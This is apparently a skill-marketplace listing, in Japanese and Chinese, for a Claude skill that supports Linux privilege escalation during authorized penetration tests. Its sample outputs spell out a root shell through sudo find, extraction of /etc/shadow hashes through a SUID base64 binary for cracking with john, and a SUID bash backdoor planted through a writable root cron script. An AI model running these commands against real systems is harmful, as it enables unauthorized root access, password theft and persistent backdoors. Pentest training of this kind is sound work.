linux-privilege-escalation
Linux 特権昇格アセスメントを実行する
セキュリティ専門家は、承認されたペネトレーションテスト中に Linux システムでの特権昇格のベクトルを特定するための体系的な方法を必要としています。このスキルは、カーネルの脆弱性、sudo の設定ミス、SUID バイナリ、および cron ジョブの弱点を網羅する包括的な列挙と悪用ワークフローを提供します。
下载技能 ZIP
在 Claude 中上传
前往 设置 → 功能 → 技能 → 上传技能
开启并开始使用
测试它
正在使用“linux-privilege-escalation”。 ユーザーが sudo -l を実行し、/usr/bin/find を root として実行できることを発見
预期结果:
GTFOBins 悪用:'sudo find . -exec /bin/bash \; -quit' を実行して root シェルを生成します。find コマンドの -exec フラグにより、root 権限で任意のコマンドを実行できます。
正在使用“linux-privilege-escalation”。 /usr/bin/base64 に SUID base64 バイナリを発見
预期结果:
悪用:'base64 /etc/shadow | base64 -d > shadow.txt' を使用してパスワードハッシュを抽出します。shadow.txt を攻撃者のマシンに転送し、'john --wordlist=rockyou.txt shadow.txt' でクラックして平文パスワードを復元します。
正在使用“linux-privilege-escalation”。 root cron ジョブが書き込み可能なスクリプト /opt/scripts/backup.sh を実行
预期结果:
ハイジャック:'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' をスクリプトに追加します。cron 実行後、'/tmp/bash -p' を実行して SUID バックドア経由で永続的な root アクセスを取得します。
安全审计
严重This skill contains complete weaponized exploitation workflows for Linux privilege escalation. While framed as educational content for penetration testing, it provides ready-to-use commands for gaining unauthorized root access, credential theft via /etc/shadow access, SUID backdoor creation, kernel exploitation, and persistent reverse shell payloads. The static scanner correctly identified 44 high-risk patterns including sudo exploitation, SUID manipulation, and shadow file access. False positives include Ruby backtick detection (actually bash commands in markdown). This content should only be distributed in controlled professional security contexts with explicit authorization requirements.
严重问题 (4)
高风险问题 (6)
中风险问题 (3)
低风险问题 (3)
风险因素
⚡ 包含脚本 (1)
⚙️ 外部命令 (7)
🌐 网络访问 (4)
检测到的模式
质量评分
你能构建什么
承認されたペネトレーションテスト
内部ネットワークアセスメントを実行するセキュリティコンサルタントは、このスキルを使用して特権昇格のパスを体系的に特定し、初期アクセスのビジネスインパクトを実証します。
セキュリティ監査とコンプライアンス
システム管理者は、攻撃者が悪用する前に設定ミスを特定して修正するために、自社インフラを監査します。
セキュリティトレーニングと教育
OSCP、GPEN、CRT などの認定資格の勉強を行うセキュリティ専門家は、ラボ環境で一般的な Linux 特権昇格の手法を理解するためにこのスキルを使用します。
试试这些提示
Linux システムへの低権限のシェルアクセスがあります。カーネルバージョン、sudo 権限、SUID バイナリ、実行中のサービスを含む潜在的な特権昇格のベクトルを特定するために、システムの列挙を支援してください。
'sudo -l' を実行でき、特定のバイナリへの NOPASSWD アクセスがあることがわかります。出力を分析し、許可された各コマンドの GTFOBins 悪用技術を提供してください。
このシステム上のすべての SUID バイナリを特定し、特権昇格のために悪用できるものを特定してください。脆弱な各バイナリの具体的な悪用コマンドを提供してください。
カーネルバージョンは [VERSION] です。このカーネルに適用可能な既知のエクスプロイトを検索し、コンパイルおよび実行手順を提供してください。主要なエクスプロイトが失敗した場合のフォールバックオプションも含めてください。
最佳实践
- 常にテスト前に書面の承認を取得し、スコープ境界を確認する
- システムクラッシュを回避するために、本番環境での使用前にカーネルエクスプロイトをラボ環境でテストする
- 修正とクリーンアップのために、アセスメント中に行ったすべての変更を文書化する
避免
- エクスプロイトのメカニズムや失敗モードを理解せずにカーネルエクスプロイトを実行する
- 承認されたアセスメント期間を超えて永続的なバックドアを作成する
- 特権昇格を実証するために必要な範囲を超えてデータにアクセスまたは流出させる
常见问题
このスキルの使用は合法ですか?
カーネルエクスプロイトはすべての Linux システムで機能しますか?
エクスプロイトでシステムがクラッシュした場合、どうすべきですか?
SUID バイナリが悪用可能かどうかをどうやって知りますか?
このスキルは AWS や Azure などのクラウド環境で使用できますか?
このスキルと LinPEAS などのツールの違いは何ですか?
开发者详情
作者
zebbern许可证
MIT
仓库
https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/linux-privilege-escalation引用
main
文件结构
📄 SKILL.md